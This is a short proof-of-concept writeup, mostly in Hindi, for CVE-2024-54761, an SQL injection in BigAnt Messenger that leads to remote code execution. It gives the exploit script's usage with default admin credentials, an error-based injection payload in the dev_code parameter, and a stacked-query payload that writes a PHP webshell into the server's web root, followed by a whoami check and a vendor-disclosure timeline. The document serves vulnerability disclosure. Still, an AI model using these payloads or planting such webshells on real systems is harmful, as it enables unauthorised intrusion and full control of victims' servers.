
CVE-2024-54761 PoC
BigAnt Messenger में SQL इंजेक्शन भेद्यता RCE भेद्यता का कारण बनती है। शोषण करने के लिए चरणों का पालन करें।
उपयोग:
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
-h, --help show this help message and exit
-r, --rhost RHOST Target IP address
-p, --rport RPORT Target port (default 8000)
-u, --username USERNAME
Login username (default admin)
-P, --password PASSWORD
Login password (default 123456)
डिफ़ॉल्ट क्रेडेंशियल के लिए शोषण चलाएं।
python CVE-2024-54761.py -r 127.0.0.1
dev_code पैरामीटर के साथ उपयोग किए गए डेटाबेस संस्करण को निकालें जो SQLi के लिए उजागर है।
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--
SQL स्टैक क्वेरी का उपयोग करके लक्ष्य पर php वेबशेल अपलोड करें।
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -
कमांड निष्पादन का प्रमाण:
/shell.php?cmd=whoami

31-10-2024: विक्रेता को ईमेल के माध्यम से भेद्यताएं प्रस्तुत कीं
31-10-2024: विक्रेता को ईमेल किया, कोई प्रतिक्रिया नहीं
15-11-2024: विक्रेता को ईमेल किया, कोई प्रतिक्रिया नहीं
15-11-2024: CVE का अनुरोध किया
https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com